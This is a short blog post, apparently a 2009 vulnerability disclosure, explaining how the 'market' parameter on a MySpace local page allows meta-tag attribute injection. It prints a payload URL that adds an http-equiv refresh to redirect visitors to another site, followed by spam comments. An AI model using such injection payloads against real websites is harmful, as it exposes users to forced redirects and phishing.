Despite the lack of HTML encoding of data passed to the vulnerable market field, tags cannot be used as sending a less than character followed by any alphabetic character redirects the user to a presumably security related error page. But by injecting the http-equiv attribute, the vulnerable meta tag can be repurposed.
http://local.myspace.com/index.cfm?fuseaction=local.hub&dma=467&market=0;http://cross-site-scripting.blogspot.com/"http-equiv="refresh"
Friday, September 4, 2009
Subscribe to:
Post Comments (Atom)
Thanks for wwriting
ReplyDeletereplica bags from turkey replica bags los angeles replica bags nyc
ReplyDelete